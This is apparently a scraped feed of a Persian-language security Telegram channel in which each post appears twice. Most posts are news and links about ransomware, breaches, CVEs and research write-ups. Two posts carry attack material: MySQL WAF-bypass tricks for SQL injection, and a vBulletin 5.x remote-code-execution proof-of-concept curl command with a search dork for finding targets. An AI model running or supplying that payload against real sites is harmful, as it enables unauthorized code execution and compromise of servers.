Mysql waf bypasses to cash on SQL-Injection bugs
1. select '\f\l\a\g'='flag'; // This is true
2. All are same
* select 'abcd';
* select 0x61626364;
* select 0b01100001011000100110001101100100;
3. select 'admin' = 'àdmin'; // is true if utf8 is allowed
#bugbounty
#sqli
@sec_nerd
1. select '\f\l\a\g'='flag'; // This is true
2. All are same
* select 'abcd';
* select 0x61626364;
* select 0b01100001011000100110001101100100;
3. select 'admin' = 'àdmin'; // is true if utf8 is allowed
#bugbounty
#sqli
@sec_nerd
باج افزار Netwalker در عرض ۵ ماه ۲۵ میلیون دلار درآمد داشته است!
این باج افزار سازمانهای بزرگ را هدف قرار میدهد و قادر به تسخیر شبکه داخلی است.
اهداف نت واکر در طی این ۵ ماه شامل:
شرکت Toll Group از استرالیا
دانشگاه ایالت میشیگان
UC san fransicsco
مرکز سلامت Lorien
گروه Dussmann آلمان
https://www.bleepingcomputer.com/news/security/netwalker-ransomware-earned-25-million-in-just-five-months/
#news
#ransom
@sec_nerd
این باج افزار سازمانهای بزرگ را هدف قرار میدهد و قادر به تسخیر شبکه داخلی است.
اهداف نت واکر در طی این ۵ ماه شامل:
شرکت Toll Group از استرالیا
دانشگاه ایالت میشیگان
UC san fransicsco
مرکز سلامت Lorien
گروه Dussmann آلمان
https://www.bleepingcomputer.com/news/security/netwalker-ransomware-earned-25-million-in-just-five-months/
#news
#ransom
@sec_nerd
BleepingComputer
Netwalker ransomware earned $25 million in just five months
The Netwalker ransomware operation has generated a total of $25 million in ransom payments since March 1st according to a new report by McAfee.
رایت آپ کشف آسیب پذیری RCE بر روی روتر های مبین نت توسط دو محقق امنیتی که از دوستان کانال و گروه هم هستند
https://medium.com/@maj0rmil4d/seowon-slc-130-router-rce-unlocking-writeup-90854ae2eb0e
#writeup
#rce
#mobinnet
@sec_nerd
https://medium.com/@maj0rmil4d/seowon-slc-130-router-rce-unlocking-writeup-90854ae2eb0e
#writeup
#rce
#mobinnet
@sec_nerd
Subdomains discover + HTTP check + content type/content size/response code + website title + IP + CNAME records + Screenshots of subdomain websites
https://github.com/Edu4rdSHL/findomain
https://asciinema.org/a/352218
#subdomain
#pentest
#bugbounty
@sec_nerd
https://github.com/Edu4rdSHL/findomain
https://asciinema.org/a/352218
#subdomain
#pentest
#bugbounty
@sec_nerd
GitHub
GitHub - Findomain/Findomain: The fastest and complete solution for domain recognition. Supports screenshoting, port scan, HTTP…
The fastest and complete solution for domain recognition. Supports screenshoting, port scan, HTTP check, data import from other tools, subdomain monitoring, alerts via Discord, Slack and Telegram, ...
Reflected XSS in Facebook’s mirror websites
https://medium.com/@sudhanshur705/reflected-xss-in-facebooks-mirror-websites-4384b4eb3e11
#writeup
#xss
@sec_nerd
https://medium.com/@sudhanshur705/reflected-xss-in-facebooks-mirror-websites-4384b4eb3e11
#writeup
#xss
@sec_nerd
روز گذشته ده ها حساب معروف در reddit به بهانه ی حمایت از کمپین انتخاباتی دونالد ترامپ توسط هکرها دیفیس شدند.
این عملیات با هک شدن حساب مدیران ساب ردیتهای معروفی همچون NFL و CFB و … انجام شده است.
حمله ی مذکور پس از بن شدن صفحه ی طرفداران ترامپ در ردیت اتفاق افتاد و یک اکانت که به هیچ پیامی پاسخ نمیدهد، مسئولیت این حمله را در توییتر به عهده گرفته است.
https://www.zdnet.com/article/hackers-are-defacing-reddit-with-pro-trump-messages/
#news #breach #usa #reddit
@sec_nerd
این عملیات با هک شدن حساب مدیران ساب ردیتهای معروفی همچون NFL و CFB و … انجام شده است.
حمله ی مذکور پس از بن شدن صفحه ی طرفداران ترامپ در ردیت اتفاق افتاد و یک اکانت که به هیچ پیامی پاسخ نمیدهد، مسئولیت این حمله را در توییتر به عهده گرفته است.
https://www.zdnet.com/article/hackers-are-defacing-reddit-with-pro-trump-messages/
#news #breach #usa #reddit
@sec_nerd
تیم امنیتی Checkpoint آسیب پذیری جدیدی را در پردازنده های Qualcomm کشف کرده است که بیش از یک میلیارد دستگاه تلفن همراه را در معرض خطر قرار میدهد.
پردازنده های Snapdragon که در دستگاه های اندرویدی شرکت های گوگل، سامسونگ، ال جی، شیائومی و … مورد استفاده قرار میگیرد به مهاجمان اجازه میدهد:
بطور کامل از گوشی جاسوسی کرده و تمام اطلاعات آن شامل تصاویر،ویدیوها،تماسها، صدای میکروفن و اطلاعات مکانی گوشی را دریافت کند
تمامی داده های موجود در گوشی را بصورت دائمی از بین ببرد
بدافزارها بصورت کامل میتوانند بر روی گوشی اجرا و غیر قابل حذف شوند.
شناسه های ثبت شده برای این آسیب پذیری ها:
CVE-2020-11201, CVE-2020-11202, CVE-2020-11206, CVE-2020-11207, CVE-2020-11208 and CVE-2020-11209
https://blog.checkpoint.com/2020/08/06/achilles-small-chip-big-peril/
#news
#android
@sec_nerd
پردازنده های Snapdragon که در دستگاه های اندرویدی شرکت های گوگل، سامسونگ، ال جی، شیائومی و … مورد استفاده قرار میگیرد به مهاجمان اجازه میدهد:
بطور کامل از گوشی جاسوسی کرده و تمام اطلاعات آن شامل تصاویر،ویدیوها،تماسها، صدای میکروفن و اطلاعات مکانی گوشی را دریافت کند
تمامی داده های موجود در گوشی را بصورت دائمی از بین ببرد
بدافزارها بصورت کامل میتوانند بر روی گوشی اجرا و غیر قابل حذف شوند.
شناسه های ثبت شده برای این آسیب پذیری ها:
CVE-2020-11201, CVE-2020-11202, CVE-2020-11206, CVE-2020-11207, CVE-2020-11208 and CVE-2020-11209
https://blog.checkpoint.com/2020/08/06/achilles-small-chip-big-peril/
#news
#android
@sec_nerd
نفوذ به شبکه از طریق یک لامپ!
https://research.checkpoint.com/2020/dont-be-silly-its-only-a-lightbulb/
#network #pentest
#iot
@sec_nerd
https://research.checkpoint.com/2020/dont-be-silly-its-only-a-lightbulb/
#network #pentest
#iot
@sec_nerd
نفوذ به مرسدس بنز و در دست گرفتن کنترل آن در کنفرانس بلک هت ۲۰۲۰
https://i.blackhat.com/USA-20/Thursday/us-20-Yan-Security-Research-On-Mercedes-Benz-From-Hardware-To-Car-Control.pdf
#iot #blackhat
#pentest
@sec_nerd
https://i.blackhat.com/USA-20/Thursday/us-20-Yan-Security-Research-On-Mercedes-Benz-From-Hardware-To-Car-Control.pdf
#iot #blackhat
#pentest
@sec_nerd
This media is not supported in your browser
VIEW IN TELEGRAM
Exploiting Android Messengers with WebRTC: CVE-2020-6514 - CVE-2020-6831 - CVE-2020-6389 - CVE-2020-6387.
Part 1 https://googleprojectzero.blogspot.com/2020/08/exploiting-android-messengers-part-1.html
Part 2 https://googleprojectzero.blogspot.com/2020/08/exploiting-android-messengers-part-2.html
Part 3 https://googleprojectzero.blogspot.com/2020/08/exploiting-android-messengers-part-3.html
#android
#webrtc
@sec_nerd
Part 1 https://googleprojectzero.blogspot.com/2020/08/exploiting-android-messengers-part-1.html
Part 2 https://googleprojectzero.blogspot.com/2020/08/exploiting-android-messengers-part-2.html
Part 3 https://googleprojectzero.blogspot.com/2020/08/exploiting-android-messengers-part-3.html
#android
#webrtc
@sec_nerd
0day RCE exploit on vBulletin 5xx
dork ; intext:"Powered by vBulletin"
POC
curl -s https://SITE/ajax/render/widget_tabbedcontainer_tab_panel -d 'subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo%20shell_exec("id"); exit;'
#vbulletin
#rce
#pentest
#web
@sec_nerd
dork ; intext:"Powered by vBulletin"
POC
curl -s https://SITE/ajax/render/widget_tabbedcontainer_tab_panel -d 'subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo%20shell_exec("id"); exit;'
#vbulletin
#rce
#pentest
#web
@sec_nerd
یکی از کارکنان شرکت SANS هک شد!
ایمیل این کارمند سنز با حمله ی فیشینگ توسط یک هکر ناشناس مورد نفوذ قرار گرفت و برخی قوانین فوروارد به آن اضافه شد که منجر به لو رفتن برخی اطلاعات غیرحساس گردید.
این اطلاعات شامل ۲۸ هزار آدرس ایمیل و عنوان شغلی، کشور محل زندگی و .. از کارکنان سنز می باشد.
شرکت SANS یک شرکت شناخته شده در عرصه آموزش امنیت سایبری میباشد.
https://www.sans.org/dataincident2020
#sans
#breach #news
@sec_nerd
ایمیل این کارمند سنز با حمله ی فیشینگ توسط یک هکر ناشناس مورد نفوذ قرار گرفت و برخی قوانین فوروارد به آن اضافه شد که منجر به لو رفتن برخی اطلاعات غیرحساس گردید.
این اطلاعات شامل ۲۸ هزار آدرس ایمیل و عنوان شغلی، کشور محل زندگی و .. از کارکنان سنز می باشد.
شرکت SANS یک شرکت شناخته شده در عرصه آموزش امنیت سایبری میباشد.
https://www.sans.org/dataincident2020
#sans
#breach #news
@sec_nerd
www.sans.org
SANS Institute
Computer security training, certification and free resources. We specialize in computer/network security, digital forensics, application security and IT audit.